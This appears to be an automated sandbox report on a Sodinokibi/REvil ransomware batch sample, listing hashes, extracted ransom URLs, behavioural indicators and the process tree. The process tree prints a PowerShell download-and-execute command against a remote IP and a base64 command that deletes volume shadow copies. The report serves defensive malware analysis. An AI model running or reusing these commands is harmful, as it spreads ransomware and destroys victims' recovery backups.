Analysis
Max time kernel: 145s
Max time network: 37s
Platform: windows7_x64
Resource: win7v200430
Submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
  Sample: ab5cb2e23e6cb4c513ac6a13703f86bf.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: ab5cb2e23e6cb4c513ac6a13703f86bf.bat
  Resource: win10v200430
General
Target: ab5cb2e23e6cb4c513ac6a13703f86bf.bat
Size: 214B
MD5: ea3a91c4eabb53ea1c81584514484a54
SHA1: 4ffb8f1584f99e6d9902953d956127871c4e21eb
SHA256: 923b7329858020e85b39023f735fe9cffc528a5dd16e66de4de494c11050d475
SHA512: 38d8ad718a57fa0db8ae41c578aea725c940af2eed5e975498f9642699c2f40ab9515ad1eb0a380109c30c53bbb9701bea646a8656dd0070a74e50a5366d646b
Malware Config
Extracted: http://185.103.242.78/pastes/ab5cb2e23e6cb4c513ac6a13703f86bf
Extracted: C:\w5nw631jn0-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DC78CB438E8005A
  http://decryptor.cc/2DC78CB438E8005A
Signatures
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  - flow 3, PID 1460, process powershell.exe
Drops file in Program Files directory (18 IoCs)
Processes: powershell.exe
  - File created: \??\c:\program files (x86)\w5nw631jn0-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\StepConvert.mpeg (powershell.exe)
  - File opened for modification: \??\c:\program files\SwitchMount.pptm (powershell.exe)
  - File opened for modification: \??\c:\program files\UseAssert.svgz (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w5nw631jn0-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\RegisterDebug.php (powershell.exe)
  - File opened for modification: \??\c:\program files\AssertRemove.eps (powershell.exe)
  - File opened for modification: \??\c:\program files\InvokeSave.pub (powershell.exe)
  - File opened for modification: \??\c:\program files\LockSelect.ppsm (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\w5nw631jn0-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\StepSave.dotm (powershell.exe)
  - File created: \??\c:\program files\w5nw631jn0-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\ConnectSet.kix (powershell.exe)
  - File opened for modification: \??\c:\program files\ConvertFromResize.dotx (powershell.exe)
  - File opened for modification: \??\c:\program files\InitializeReceive.css (powershell.exe)
  - File opened for modification: \??\c:\program files\SuspendRestore.3gp (powershell.exe)
  - File opened for modification: \??\c:\program files\TraceBackup.m1v (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\w5nw631jn0-readme.txt (powershell.exe)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  - PID 1356 (cmd.exe) wrote to memory of PID 1460 (powershell.exe)
  - PID 1460 (powershell.exe) wrote to memory of PID 1692 (powershell.exe), 4 identical rows
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token SeDebugPrivilege: PID 1460 powershell.exe
  - Token SeDebugPrivilege: PID 1460 powershell.exe
  - Token SeDebugPrivilege: PID 1692 powershell.exe
  - Token SeBackupPrivilege: PID 368 vssvc.exe
  - Token SeRestorePrivilege: PID 368 vssvc.exe
  - Token SeAuditPrivilege: PID 368 vssvc.exe
  - Token SeTakeOwnershipPrivilege: PID 1460 powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  - 77 rows, each a PID/process pair: PID 1460 powershell.exe (the large majority of rows) and PID 1692 powershell.exe (2 rows)
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\88m.bmp" (powershell.exe)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  - PID 1460 powershell.exe
Processes
C:\Windows\system32\cmd.exe (PID 1356)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ab5cb2e23e6cb4c513ac6a13703f86bf.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1460)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ab5cb2e23e6cb4c513ac6a13703f86bf');Invoke-NOTJYHI;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1692)
      Command line (-e is a base64-encoded command): powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\vssvc.exe (PID 368)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service